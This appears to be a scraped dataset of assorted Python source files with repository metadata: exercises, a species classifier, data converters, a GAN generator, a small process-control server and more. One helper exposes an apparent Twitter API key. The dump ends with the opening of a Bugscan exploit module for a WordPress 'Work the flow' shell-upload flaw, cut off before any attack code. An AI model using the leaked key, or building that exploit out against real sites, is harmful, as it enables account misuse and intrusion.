max_stars_repo_path
stringlengths 3
269
| max_stars_repo_name
stringlengths 4
119
| max_stars_count
int64 0
191k
| id
stringlengths 1
7
| content
stringlengths 6
1.05M
| score
float64 0.23
5.13
| int_score
int64 0
5
|
---|---|---|---|---|---|---|
2-python-intermediario (Programacao Procedural)/aula01-funcoes/exercicio2.py | Leodf/projetos-python | 0 | 12789251 | <reponame>Leodf/projetos-python
"""
Crie uma função 1 que recebe uma função 2 como parâmetro e retorne o valor da função2 executada.
"""
def ola_mundo():
return 'Olá mundo!'
def mestre(funcao):
return funcao()
executando = mestre(ola_mundo)
print(executando)
"""
Crie uma função1 que recebe uma função2 como parametro e retorne o valor da funcçao2 executada. Faça a função 1 executar duas funções que recebam um numero diferente de argumentos
"""
def funcmestre(funcao, *args, **kwargs):
return funcao(*args, **kwargs)
def falar_oi(nome):
return f'Oi {nome} '
def saudacao(nome, saudacao):
return f'{saudacao} {nome}'
executar = funcmestre(falar_oi, 'Leo')
executar2 = funcmestre(saudacao, 'Leo', saudacao='Bom dia')
print(executar)
print(executar2) | 3.578125 | 4 |
alluka/__init__.py | FasterSpeeding/Alluka | 9 | 12789252 | <gh_stars>1-10
# -*- coding: utf-8 -*-
# cython: language_level=3
# BSD 3-Clause License
#
# Copyright (c) 2020-2022, Faster Speeding
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# * Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""A type based dependency injection framework for Python 3.9+."""
from __future__ import annotations
__all__: list[str] = [
"AllukaError",
"AsyncOnlyError",
"AsyncSelfInjecting",
"BasicContext",
"Client",
"Injected",
"InjectedDescriptor",
"MissingDependencyError",
"SelfInjecting",
"abc",
"inject",
]
import typing
from . import abc
from ._client import BasicContext
from ._client import Client
from ._client import inject
from ._errors import AllukaError
from ._errors import AsyncOnlyError
from ._errors import MissingDependencyError
from ._self_injecting import AsyncSelfInjecting
from ._self_injecting import SelfInjecting
from ._types import Injected
from ._types import InjectedDescriptor
__author__: typing.Final[str] = "Faster Speeding"
__ci__: typing.Final[str] = "https://github.com/FasterSpeeding/Alluka/actions"
__copyright__: typing.Final[str] = "© 2020-2022 Faster Speeding"
__coverage__: typing.Final[str] = "https://codeclimate.com/github/FasterSpeeding/Alluka"
__docs__: typing.Final[str] = "https://alluka.cursed.solutions/"
__email__: typing.Final[str] = "<EMAIL>"
__issue_tracker__: typing.Final[str] = "https://github.com/FasterSpeeding/Alluka/issues"
__license__: typing.Final[str] = "BSD"
__url__: typing.Final[str] = "https://github.com/FasterSpeeding/Alluka"
__version__: typing.Final[str] = "0.1.1"
| 1.375 | 1 |
Python/code case/code case 26.py | amazing-2020/pdf | 3 | 12789253 | <gh_stars>1-10
import random
def number():
return int(input('Enter a number: '))
i = 0
a = random.randint(-10, 100)
while True:
i += 1
b = number()
if a > b:
print('Number too small: ')
elif a < b:
print('Number too big: ')
else:
print('After %d times you succeed get %d' % (i, a))
break
| 3.796875 | 4 |
classify_images.py | bw4sz/SpeciesClassification | 0 | 12789254 | #######
#
# classify_images.py
#
# This is a test driver for running our species classifiers and detectors.
# The script classifies one or more hard-coded image files.
#
# Because the inference code has not been assembled into a formal package yet,
# you should define API_ROOT to point to the base of our repo. This
# will be added to your Python path later in the script.
#
# This script has two non-code dependencies:
#
# * a classification model file (and, optionally, a detection model model)
# * a taxonomy file, so the scientific names used in the training data can
# be mapped to common names.
#
# We are currently testing against PyTorch 0.4.1 and Cuda 9.0, and we have tested on
# both Linux and Windows.
#
#######
#%% Constants and imports
import sys
import os
import pandas as pd
# Directory to which you sync'd the repo. Probably the same
# directory this file lives in, but for portability, this file is set up to only
# take dependencies on the repo according to this constant.
API_ROOT = r'd:\git\SpeciesClassification'
# Path to taxa.csv, for latin --> common mapping
#
# Set to None to disable latin --> common mapping
TAXONOMY_PATH = r'd:\temp\taxa.csv' # None
IMAGES_TO_CLASSIFY = [
r"D:\temp\animals\African_Elephant\30651.ngsversion.1421960098780.jpg",
r"D:\temp\animals\Alligator\Alligator_mississippiensis_01.JPG"
]
# CLASSIFICATION_MODEL_PATH = r'd:\temp\models\inc4-incres2-560-78.5\model_deploy.pth.tar'
CLASSIFICATION_MODEL_PATH = r"D:\temp\models\resnext-448-78.8\model_best.pth.tar"
# Detection (i.e., bounding box generation) is optional; set to None
# to disable detection
DETECTION_MODEL_PATH = None
SUBDIRS_TO_IMPORT = ['DetectionClassificationAPI','FasterRCNNDetection','PyTorchClassification']
# This must be True if detection is enabled. Classification can be run
# on the CPU or GPU.
USE_GPU = True
# List of image sizes to use, one per model in the ensemble. Images will be resized
# and reshaped to square images prior to classification.
#
# We typically specify [560,560] if we're loading our Inception/InceptionResnet
# ensemble. For ResNext, we typically specify [448].
#
# IMAGE_SIZES = [560, 560]
IMAGE_SIZES = [448]
#%% Path setup to import the classification code
if (not API_ROOT.lower() in map(str.lower,sys.path)):
print("Adding {} to the python path".format(API_ROOT))
sys.path.insert(0,API_ROOT)
for s in SUBDIRS_TO_IMPORT:
importPath = os.path.join(API_ROOT,s)
print("Adding {} to the python path".format(API_ROOT))
sys.path.insert(0,importPath)
#%% Import classification modules
import api as speciesapi
#%% Build Latin --> common mapping
latinToCommon = {}
if TAXONOMY_PATH != None:
print("Reading taxonomy file")
# Read taxonomy file; takes ~1 minute
df = pd.read_csv(TAXONOMY_PATH)
df = df.fillna('')
# Columns are:
#
# taxonID,scientificName,parentNameUsageID,taxonRank,vernacularName,wikipedia_url
# Create dictionary by ID
nRows = df.shape[0]
for index, row in df.iterrows():
latinName = row['scientificName']
latinName = latinName.strip()
if len(latinName)==0:
print("Warning: invalid scientific name at {}".format(index))
latinName = 'unknown'
commonName = row['vernacularName']
commonName = commonName.strip()
latinName = latinName.lower()
commonName = commonName.lower()
latinToCommon[latinName] = commonName
print("Finished reading taxonomy file")
#%% Define Latin-->common lookup
def doLatinToCommon(latinName):
if len(latinToCommon) == 0:
return latinName
latinName = latinName.lower()
if not latinName in latinToCommon:
print("Warning: latin name {} not in lookup table".format(latinName))
commonName = latinName
else:
commonName = latinToCommon[latinName]
commonName = commonName.strip()
if (len(commonName) == 0):
print("Warning: empty result for latin name {}".format(latinName))
commonName = latinName
return commonName
#%% Create the model(s)
assert os.path.isfile(CLASSIFICATION_MODEL_PATH)
if DETECTION_MODEL_PATH != None:
assert os.path.isfile(DETECTION_MODEL_PATH)
print("Loading model")
model = speciesapi.DetectionClassificationAPI(CLASSIFICATION_MODEL_PATH, DETECTION_MODEL_PATH, IMAGE_SIZES, USE_GPU)
print("Finished loading model")
#%% Classify images
nImages = len(IMAGES_TO_CLASSIFY)
for iImage,imageFileName in enumerate(IMAGES_TO_CLASSIFY):
print("Processing image {} of {}".format(iImage,nImages))
# def predict_image(self, image_path, topK=1, multiCrop=False, predict_mode=PredictMode.classifyUsingDetect):
try:
prediction = model.predict_image(imageFileName, topK=5, multiCrop=False,
predict_mode=speciesapi.PredictMode.classifyOnly)
except Exception as e:
print("Error classifying image {} ({}): {}".format(iImage,imageFileName,str(e)))
continue
fn = os.path.splitext(imageFileName)[0]
for i in range(0, len(prediction.species)):
latinName = prediction.species[i]
likelihood = prediction.species_scores[i]
commonName = doLatinToCommon(latinName)
print('"{}","{}","{}","{}","{}","{}"\n'.format(
iImage,fn,i,latinName,commonName,likelihood))
print("Finished classifying {} images".format(nImages))
| 2.140625 | 2 |
xml2csv.py | LynnChan706/object_detection_auto | 0 | 12789255 | #!/usr/bin/env python3.5
# coding=utf-8
'''
@date = '17/12/1'
@author = 'lynnchan'
@email = '<EMAIL>'
'''
import os
import glob
import pandas as pd
import xml.etree.ElementTree as ET
from gconfig import *
train_path = Train_Data_Path
test_path = Test_Data_Path
def xml_to_csv(path):
xml_list = []
for xml_file in glob.glob(path + '/*.xml'):
tree = ET.parse(xml_file)
root = tree.getroot()
for member in root.findall('object'):
if os.path.splitext(root.find('filename').text)[1] == '.jpg':
value = (root.find('filename').text,
int(root.find('size')[0].text),
int(root.find('size')[1].text),
member[0].text,
int(member[4][0].text),
int(member[4][1].text),
int(member[4][2].text),
int(member[4][3].text)
)
else:
value = (root.find('filename').text+'.jpg',
int(root.find('size')[0].text),
int(root.find('size')[1].text),
member[0].text,
int(member[4][0].text),
int(member[4][1].text),
int(member[4][2].text),
int(member[4][3].text)
)
xml_list.append(value)
column_name = ['filename', 'width', 'height', 'class', 'xmin', 'ymin', 'xmax', 'ymax']
xml_df = pd.DataFrame(xml_list, columns=column_name)
return xml_df
def creat_csv():
if type(train_path) !=list:
xml_train = xml_to_csv(train_path)
xml_train.to_csv(train_path+'/'+Train_File_Name+'.csv', index=None)
print('Successfully converted train xml to csv.')
else:
for i in train_path:
xml_train = xml_to_csv(i)
xml_train.to_csv(i + '/' + Train_File_Name + '.csv', index=None)
print('Successfully converted list train xml to csv.')
if type(test_path) != list:
xml_test = xml_to_csv(test_path)
xml_test.to_csv(test_path+'/'+Test_File_Name+'.csv', index=None)
print('Successfully converted test xml to csv.')
else:
for i in test_path:
xml_train = xml_to_csv(i)
xml_train.to_csv(i + '/' + Test_File_Name + '.csv', index=None)
print('Successfully converted list train xml to csv.')
if __name__ == '__main__':
creat_csv()
| 3 | 3 |
notebooks/method_comp_c.py | nedlrichards/tau_decomp | 0 | 12789256 | <reponame>nedlrichards/tau_decomp
from scipy.io import loadmat
import gsw
import numpy as np
import matplotlib.pyplot as plt
from src import Config, lvl_profiles, grid_field, Section, SA_CT_from_sigma0_spiciness0
plt.ion()
cf = Config()
# sound speed comparison
all_lvls = np.load('data/processed/inputed_decomp.npz')
z_a = all_lvls['z_a']
x_a = all_lvls['x_a']
press = gsw.p_from_z(-z_a, cf.lat)
# extrapolate from stable position into mixed layer
stable_lvls = all_lvls['stable_lvls']
filled_lvls = all_lvls['filled_lvls']
spice_lvls = np.concatenate([stable_lvls[[0], :, :], filled_lvls[[1], :, :]])
sig_rud, tau_rud = grid_field(z_a, spice_lvls, cf.sig_lvl[:spice_lvls.shape[1]])
sa_rud, ct_rud = SA_CT_from_sigma0_spiciness0(sig_rud, tau_rud)
c_rud = gsw.sound_speed(sa_rud, ct_rud, press[:, None])
# tau difference method
decomp_fields = np.load('data/processed/decomposed_fields.npz')
z_a_decomp = decomp_fields['z_a']
c_tau_d = decomp_fields['c_spice']
z_i = z_a_decomp < 300
fig, ax = plt.subplots(2, 1, sharex=True, sharey=True, figsize=(cf.jasa_1clm, 4))
cm = ax[0].pcolormesh(x_a / 1e3, z_a, c_rud, cmap=plt.cm.coolwarm,
vmin=1497, vmax=1510)
cm = ax[1].pcolormesh(x_a / 1e3, z_a_decomp[z_i], c_tau_d[z_i, :],
cmap=plt.cm.coolwarm, vmin=1497, vmax=1510)
ax[0].set_xlim(0, 199)
ax[0].set_ylim(150, 0)
fig.supylabel('Depth (m)')
ax[1].set_xlabel('Position, $x$ (km)')
pos = ax[0].get_position()
pos.x0 += 0.07
pos.x1 += 0.07
pos.y0 += 0.04
pos.y1 += 0.09
ax[0].set_position(pos)
pos = ax[1].get_position()
pos.x0 += 0.07
pos.x1 += 0.07
pos.y0 += 0.02
pos.y1 += 0.07
ax[1].set_position(pos)
| 1.929688 | 2 |
tests/auth/test_auth.py | nabetama/slacky | 3 | 12789257 | from tests.test_common import TestSlack
class TestAuth(TestSlack):
def test_auth(self):
assert self.slack.auth
def test_auth_test(self):
assert self.slack.auth.test
def test_auth_test_response(self):
assert self.slack.auth.test.status_code == 200
| 2.078125 | 2 |
tests/fit_simulaid.py | hassnabdl/Helix-Analysis-Program | 1 | 12789258 | <gh_stars>1-10
import numpy as np
def fit_simulaid(phi):
"""
DEPRECATED AND WORKING FOR SMALL NUMBER OF SAMPLES
--
Fit theta such as:
phi_i = theta * i + phi_0 (E)
Solving the system:
| SUM(E)
| SUM(E*i for i)
that can be written:
| a11 * theta + a12 * phi_0 = b1
| a21 * theta + a22 * phi_0 = b2
---
Parameters:
phi
n
---
Return:
theta
"""
n = len(phi)-1
# coefficients
a11 = (2*n + 1)*(n + 1)*n/6
a21 = n*(n+1)/2
a12 = a21
a22 = n
# Second member
b1 = 0
b2 = 0
for i, phi in enumerate(phi):
b1 += phi*i
b2 += phi
theta = (a22*b1 - a12 * b2)/(a22*a11 - a12*a21)
return theta
def test_fit_simulaid():
import math
phi = [0, 1, 2, 3, 4, 5]
# should be 1
slope = fit(phi)
print(slope)
phi = [0, -1, -2, -3, -4, -5]
slope = fit(phi)
# should be -1
print(slope)
# Counter-examples
phi = [2.9045003839409125, 3.9638782375957637,
6.855200868214659]
slope = fit(phi)
# should be positive
print(slope)
# test_fit_simulaid()
| 3.375 | 3 |
cogs/utils/resolver.py | Lazyuki/DiscordStatsBotPython | 2 | 12789259 | <reponame>Lazyuki/DiscordStatsBotPython<filename>cogs/utils/resolver.py
import discord
import re
import shlex
ID_REGEX = re.compile(r'([0-9]{15,21})>?\b')
# Can access members with dots
def Map(dict):
__getattr__ = dict.get
__setattr__ = dict.__setitem__
__delattr__ = dict.__delitem__
def has_role(member, role_id):
if not member or not member.roles:
return False
return discord.utils.find(lambda r: r.id == role_id, member.roles) is not None
def has_any_role(member, role_ids):
if not member or not member.roles:
return False
return discord.utils.find(lambda r: r.id in role_ids, member.roles) is not None
def resolve_minimum_channel(ctx, channel_id):
channel = ctx.guild.get_channel(channel_id)
if channel is None:
channel = Map.__init__({
'name': f'#deleted-channel({channel_id})',
'id': channel_id
})
return channel
def resolve_user_id(ctx, arg):
id_match = ID_REGEX.match(arg)
guild = ctx.guild
user_id = None
if id_match is None:
arg = arg.lower()
arg_len = len(arg)
username_exact = None
potential_matches = {}
partial_matches = {}
members = guild.members
for member in members:
username = member.name.lower()
usertag = f'{username}#{member.discriminator}'.lower()
nick = member.nick.lower() if member.nick else ''
member_id = member.id
# In order of priority
if usertag == arg:
return member_id
if username == arg:
username_exact = member_id
elif nick == arg:
potential_matches[0] = member_id
elif username.startswith(arg):
potential_matches[len(username) - arg_len] = member_id
elif nick.startswith(arg):
potential_matches[len(nick) - arg_len] = member_id
elif arg in username:
partial_matches[len(username) - arg_len] = member_id
elif arg in usertag:
partial_matches[len(usertag) - arg_len] = member_id
elif arg in nick:
partial_matches[len(nick) - arg_len] = member_id
if username_exact:
return username_exact
if potential_matches:
closest = min(potential_matches.keys())
return potential_matches[closest]
if partial_matches:
closest = min(partial_matches.keys())
return partial_matches[closest]
else:
user_id = int(id_match.group(1))
return user_id
def resolve_role(ctx, role):
roles = ctx.guild.roles
role = role.lower()
starts = []
contains = []
for r in roles:
name = r.name.lower()
if name == role:
return r
if name.startswith(role):
starts.append(r)
if role in name:
contains.append(r)
if starts:
return starts[0]
if contains:
return contains[0]
return None
def resolve_options(content: str, accepted_options: dict):
"""
accepted_options: {
name: {
abbrev: str;
boolean: bool;
}
}
"""
if (not content) or (not accepted_options):
return (content, {})
resolved = {}
rest_content = []
names = accepted_options.keys()
abbrevs = { opt['abbrev']: key for key, opt in accepted_options.items() }
words = shlex.split(content)
word_iter = iter(words)
try:
while True:
word = next(word_iter)
if word.startswith('--'):
name = word[2:]
if name in names:
opt = accepted_options[name]
boolean = opt['boolean']
if boolean:
resolved[name] = True
else:
resolved[name] = next(word_iter)
elif word.startswith('-'):
abs = word[1:]
for a in abs:
if a in abbrevs:
name = abbrevs[a]
opt = accepted_options[name]
boolean = opt['boolean']
if boolean:
resolved[name] = True
else:
resolved[name] = next(word_iter)
else:
rest_content.append(word)
except StopIteration:
pass
return (' '.join(rest_content), resolved)
| 2.40625 | 2 |
common/models/generators.py | Aixile/chainer-gan-experiments | 70 | 12789260 | import numpy as np
import math
import chainer
import chainer.functions as F
import chainer.links as L
from chainer import cuda, optimizers, serializers, Variable
from chainer import function
from chainer.utils import type_check
from .ops import *
class DCGANGenerator(chainer.Chain):
def __init__(self, latent=128, out_ch=3, base_size=1024, use_bn=True, up_layers=4, upsampling='up_deconv'):
layers = {}
self.up_layers = up_layers
self.base_size = base_size
self.latent = latent
if use_bn:
norm = 'bn'
w = chainer.initializers.Normal(0.02)
else:
norm = None
w = None
base = base_size
layers['c_first'] = NNBlock(latent, 4*4*base, nn='linear', norm=norm, w_init=w)
for i in range(up_layers-1):
layers['c'+str(i)] = NNBlock(base, base//2, nn=upsampling, norm=norm, w_init=w)
base = base//2
layers['c'+str(up_layers-1)] = NNBlock(base, out_ch, nn=upsampling, norm=None, w_init=w, activation=F.tanh)
#print(layers)
super(DCGANGenerator, self).__init__(**layers)
def __call__(self, z, test=False):
h = self.c_first(z, test=test)
h = F.reshape(h, (h.data.shape[0], self.base_size, 4, 4))
for i in range(self.up_layers):
h = getattr(self, 'c'+str(i))(h, test=test)
return h
| 2.078125 | 2 |
python_practice/python_tricks/chp3/args_kwargs/example_3_return_nothing.py | sokunmin/deep_learning_practices | 0 | 12789261 | def foo(value):
if value:
return value
else:
return None
def foo2(value):
"""Bare return statement implies `return None`"""
if value:
return value
else:
return
def foo3(value):
"""Missing return statement implies `return None`"""
if value:
return value
print('[1-1] ', type(foo(0)))
print('[1-2] ', (foo(0)))
print('[2-1] ', type(foo2(0)))
print('[2-2] ', (foo2(0)))
print('[3-1] ', type(foo3(0)))
print('[3-2] ', (foo3(0))) | 3.9375 | 4 |
start.py | TrixiS/base-bot | 0 | 12789262 | <reponame>TrixiS/base-bot<filename>start.py
import os
import platform
from pathlib import Path
SYSTEM = platform.system()
root_path = Path(__file__).parent
os.chdir(str(root_path.absolute()))
def install_dependencies():
requirements_path = root_path / "requirements.txt"
if SYSTEM == "Windows":
install_command = "pip install wheel -r {requirements_path} --quiet"
else:
install_command = (
"python3 -m pip install -U wheel -r {requirements_path} --quiet"
)
os.system(install_command.format(requirements_path=requirements_path))
def start_bot():
if SYSTEM == "Windows":
start_command = "python -m bot"
else:
start_command = "python3 -m bot"
os.system(start_command)
def run_update():
import update
update.main()
def main():
install_dependencies()
run_update()
start_bot()
if SYSTEM == "Windows":
os.system("pause")
if __name__ == "__main__":
main()
| 2.34375 | 2 |
merge_csv.py | jfilter/wikipedia-edits-verified-accounts | 6 | 12789263 | import csv
from pathlib import Path
folder = 'recent_changes'
all_csv = [pth for pth in Path(folder).iterdir()
if pth.suffix == '.csv']
header = None
rows = []
for f_csv in all_csv:
with open(f_csv) as csvfile:
reader = csv.reader(csvfile)
header = next(reader) # read header
rows += list(reader)
with open(f'{folder}_all.csv', 'w') as csvfile:
writer = csv.writer(csvfile)
writer.writerow(header)
writer.writerows(rows)
| 3.109375 | 3 |
ex067.py | Jordemar-D-Bousquet/Exercicios_Python | 0 | 12789264 | <reponame>Jordemar-D-Bousquet/Exercicios_Python
# Faça um programa que mostre a tabuada de vários números, um de cada vez, para cada valor digitado pelo usuário.
# O programa será interrompido quando o número solicitado for negativo.
while True:
n = int(input('Digite um número para ver a sua tabuada ou um número negativo para parar: '))
if n < 0:
break
print('='*30)
for c in range(1,11):
m = n*c
print(f'{n} x {c} = {m}')
print('=' * 30)
print('Fim da Tabuada!!!') | 3.96875 | 4 |
src/compas/datastructures/network/_network.py | kathrindoerfler/compas | 0 | 12789265 | <reponame>kathrindoerfler/compas<filename>src/compas/datastructures/network/_network.py
from __future__ import print_function
from __future__ import absolute_import
from __future__ import division
from compas.datastructures.network.core import BaseNetwork
from compas.datastructures.network.core import network_split_edge
__all__ = ['Network']
class Network(BaseNetwork):
__module__ = "compas.datastructures"
split_edge = network_split_edge
# =============================================================================
# Main
# =============================================================================
if __name__ == "__main__":
# from compas.geometry import intersection_line_line_xy
from compas.datastructures import Mesh
from compas.datastructures import network_find_cycles
# from compas_plotters import NetworkPlotter
from compas_plotters import MeshPlotter
# nodes = [[0, 0, 0], [1, 0, 0], [2, 0, 0], [0, 1, 0], [1, 1, 0], [2, 1, 0]]
# edges = [[0, 1], [1, 2], [3, 4], [4, 5], [0, 3], [1, 4], [2, 5], [0, 4], [1, 5], [1, 3], [2, 4]]
data = {
0: [-40.0, 55.0, 0.0],
1: [-35.0, 55.0, 0.0],
2: [-30.0, 55.0, 0.0],
4: [-35.0, 60.0, 0.0],
6: [-37.5, 57.5, 0.0],
7: [-32.5, 57.5, 0.0],
8: [-40.0, 53.82, 0.0],
10: [-30.0, 53.82, 0.0],
11: [-35.0, 61.18, 0.0]}
# key_index = {key: index for index, key in enumerate(data)}
# nodes = data.values()
edges = [(0, 8), (0, 1), (1, 2), (10, 2), (0, 6), (6, 4), (4, 11), (4, 7), (7, 2)]
# edges = [(key_index[u], key_index[v]) for u, v in edges]
# net = Network.from_nodes_and_edges(nodes, edges)
# network = net.copy()
network = Network()
for key, xyz in data.items():
network.add_node(key, x=xyz[0], y=xyz[1], z=xyz[2])
for u, v in edges:
network.add_edge(u, v)
points = {key: network.node_coordinates(key) for key in network.nodes()}
cycles = network_find_cycles(network, breakpoints=network.leaves())
mesh = Mesh.from_vertices_and_faces(points, cycles)
# e1 = network.edge_coordinates(0, 4)
# e2 = network.edge_coordinates(1, 3)
# xyz = intersection_line_line_xy(e1, e2)
# network.delete_edge(0, 4)
# network.delete_edge(1, 3)
# x = network.add_node(x=xyz[0], y=xyz[1], z=xyz[2])
# network.add_edge(x, 0)
# network.add_edge(x, 1)
# network.add_edge(x, 3)
# network.add_edge(x, 4)
# plotter = NetworkPlotter(network, figsize=(8, 5))
# plotter.draw_nodes(text='key', radius=0.25)
# plotter.draw_edges()
# plotter.show()
plotter = MeshPlotter(mesh, figsize=(8, 5))
plotter.draw_vertices(text='key', radius=0.25)
plotter.draw_edges(keys=list(set(mesh.edges()) - set(mesh.edges_on_boundary())))
plotter.draw_faces(text='key', keys=list(set(mesh.faces()) - set(mesh.faces_on_boundary())))
plotter.save('find_cycles.png')
| 2.296875 | 2 |
primeiros-exercicios/lpc072.py | miguelsndc/PythonFirstLooks | 1 | 12789266 | <gh_stars>1-10
menor = 0
for c in range(0, 3):
produto = float(input('Digite o preço dos Produtos: '))
menor = produto
if produto < menor:
menor = produto
print(f'Você deve optar pelo produto de {menor}, pois ele é o mais barato.') | 3.9375 | 4 |
simple.py | pythonflaskserverapps/helloworld | 0 | 12789267 | #############################################
# global imports
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import unquote
import sys
import os
import json
#############################################
#############################################
# local imports
from serverutils import process
from serverutils.utils import postjson, ProcessManager
#############################################
FLASK_SERVER_URL = os.environ["FLASK_SERVER_URL"]
SIMPLE_ENGINE_PATH = os.path.join("engines", os.environ["SIMPLE_ENGINE_NAME"])
PROCESS_READ_CALLBACK_URL = FLASK_SERVER_URL + "/read"
#############################################
class SimpleProcessManager(ProcessManager):
def __init__(self, key):
super().__init__(key)
def read_line_callback(self, sline):
postjson(PROCESS_READ_CALLBACK_URL, {
"kind": "procreadline",
"prockey": self.key,
"sline": sline
})
class EngineProcessManager(SimpleProcessManager):
def __init__(self, key):
super().__init__(key)
def popen(self):
return process.PopenProcess(
SIMPLE_ENGINE_PATH,
self.read_line_callback
)
class BotProcessManager(SimpleProcessManager):
def __init__(self, key):
super().__init__(key)
def popen(self):
return process.PopenProcess(
"python",
self.read_line_callback,
proc_args = ["-u", "bot.py"],
ignore_cwd = True
)
processmanagers = {
"engine": EngineProcessManager("engine"),
"bot": BotProcessManager("bot")
}
#############################################
class testHTTPServer_RequestHandler(BaseHTTPRequestHandler):
def do_GET(self):
global processmanagers
self.send_response(200)
self.send_header('Content-type','text/html')
self.end_headers()
message = "! no command"
if len(self.path) > 1:
commandstr = unquote(self.path[1:])
print("commandstr", commandstr)
try:
commandobj = None
commandobj = json.loads(commandstr)
try:
command = commandobj.get("command", None)
key = commandobj.get("key", None)
if command == "r":
message = processmanagers[key].start()
elif command == "s":
message = processmanagers[key].stop()
else:
message = processmanagers[key].send_line(command)
except:
message = "! command error"
except:
message = "! command parse error"
print("status", message)
self.wfile.write(bytes(message, "utf8"))
#############################################
def start_server():
print('starting server...')
server_address = (sys.argv[1], int(sys.argv[2]))
httpd = HTTPServer(server_address, testHTTPServer_RequestHandler)
print('running server on address', server_address)
httpd.serve_forever()
#############################################
start_server()
print("server started") | 2.328125 | 2 |
migrations/versions/3b6e7f250153_update_trello_url_type.py | palazzem/gello | 44 | 12789268 | <gh_stars>10-100
# -*- coding: utf-8 -*-
#
# Unless explicitly stated otherwise all files in this repository are licensed
# under the Apache 2 License.
#
# This product includes software developed at Datadog
# (https://www.datadoghq.com/).
#
# Copyright 2018 Datadog, Inc.
#
"""Update trello_url type.
Revision ID: 3b6e7f250153
Revises: <PASSWORD>
Create Date: 2018-03-30 16:41:29.076091
"""
from alembic import op
import sqlalchemy as sa
revision = '3b6e7f250153'
down_revision = '0afe19626b22'
def upgrade():
op.alter_column(
'issues', 'trello_card_url',
existing_type=sa.String(length=64),
type_=sa.Text(),
existing_nullable=True
)
op.alter_column(
'pull_requests', 'trello_card_url',
existing_type=sa.String(length=64),
type_=sa.Text(),
existing_nullable=True
)
def downgrade():
op.alter_column(
'pull_requests', 'trello_card_url',
existing_type=sa.Text(),
type_=sa.String(length=64),
existing_nullable=True
)
op.alter_column(
'issues', 'trello_card_url',
existing_type=sa.Text(),
type_=sa.String(length=64),
existing_nullable=True
)
| 1.703125 | 2 |
word_count.py | Noahs-ARK/idea_relations | 29 | 12789269 | <reponame>Noahs-ARK/idea_relations
# -*- coding: utf-8 -*-
import collections
import re
import io
import gzip
import json
import functools
import logging
import numpy as np
import scipy.stats as ss
from nltk.corpus import stopwords
import utils
STOPWORDS = set(stopwords.words("english") + ["said"])
def get_ngram_list(input_words, ngrams=1, filter_stopwords=True,
bigram_dict=None):
words = [w.lower() for w in input_words.split()]
result = []
for start in range(len(words) - ngrams + 1):
tmp_words = words[start:start+ngrams]
if filter_stopwords and any([w in STOPWORDS for w in tmp_words]):
continue
w = " ".join(tmp_words)
result.append(w)
return result
def get_mixed_tokens(input_words, ngrams=1, filter_stopwords=True,
bigram_dict=None):
words = [w.lower() for w in input_words.split()]
result, index = [], 0
while index < len(words):
w = words[index]
if filter_stopwords and w in STOPWORDS:
index += 1
continue
# look forward
if index < len(words) - 1:
bigram = w + " " + words[index + 1]
if bigram in bigram_dict:
result.append(bigram)
index += 2
continue
result.append(w)
index += 1
return result
def get_word_count(input_file, filter_stopwords=True, ngrams=1,
bigram_dict=None, words_func=None):
result = collections.defaultdict(int)
for data in utils.read_json_list(input_file):
words = words_func(data["text"], ngrams=ngrams,
filter_stopwords=filter_stopwords,
bigram_dict=bigram_dict)
for w in words:
result[w] += 1
return result
def find_bigrams(filename, output_file, filter_stopwords=True, threshold=100,
min_count=5):
unigram_count = get_word_count(filename,
filter_stopwords=filter_stopwords, ngrams=1,
words_func=get_ngram_list)
total_words = float(sum(unigram_count.values()))
bigram_count = get_word_count(filename,
filter_stopwords=filter_stopwords, ngrams=2,
words_func=get_ngram_list)
bigram_list = []
for w in bigram_count:
words = w.split()
score = (bigram_count[w] - min_count) * total_words \
/ (unigram_count[words[0]] * unigram_count[words[1]])
if score > threshold:
bigram_list.append((score, w))
bigram_list.sort(reverse=True)
with open(output_file, "w") as fout:
for score, w in bigram_list:
fout.write("%s\n" % json.dumps({"word": w, "score": score}))
def load_bigrams(filename):
bigram_dict = {}
with open(filename) as fin:
for line in fin:
data = json.loads(line)
bigram_dict[data["word"]] = data["score"]
return bigram_dict
def get_word_dict(word_count, top=10000, filter_regex=None):
if filter_regex:
word_count = {w: word_count[w] for w in word_count
if all([re.match(filter_regex, sw) for sw in w.split()])}
words = get_most_frequent(word_count, top=top)
return {v[1]: i for i, v in enumerate(words)}
def get_most_frequent(word_cnt, top=10000):
words = [(word_cnt[w], w) for w in word_cnt
if re.match("\w+", w)]
words.sort(reverse=True)
min_threshold = words[top - 1][0]
return [v for v in words if v[0] >= min_threshold]
| 2.84375 | 3 |
hidden.py | KangaroosInAntarcitica/TwitterMap | 0 | 12789270 | # Keep this file separate
# https://apps.twitter.com/
# Create new App and get the four strings
def oauth():
return {"consumer_key": "ejp9meWGxr5g1jH5qZozgvUwB",
"consumer_secret": "<KEY>",
"token_key": "<KEY>",
"token_secret": "<KEY>"}
| 2.421875 | 2 |
Bugscan_exploits-master/exp_list/exp-602.py | csadsl/poc_exp | 11 | 12789271 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
__author__ = 'tyq'
# Name: Wordpress Work the flow file upload 2.5.2 Shell Upload Vulnerability
# Refer: https://www.bugscan.net/#!/x/21599
def assign(service, arg):
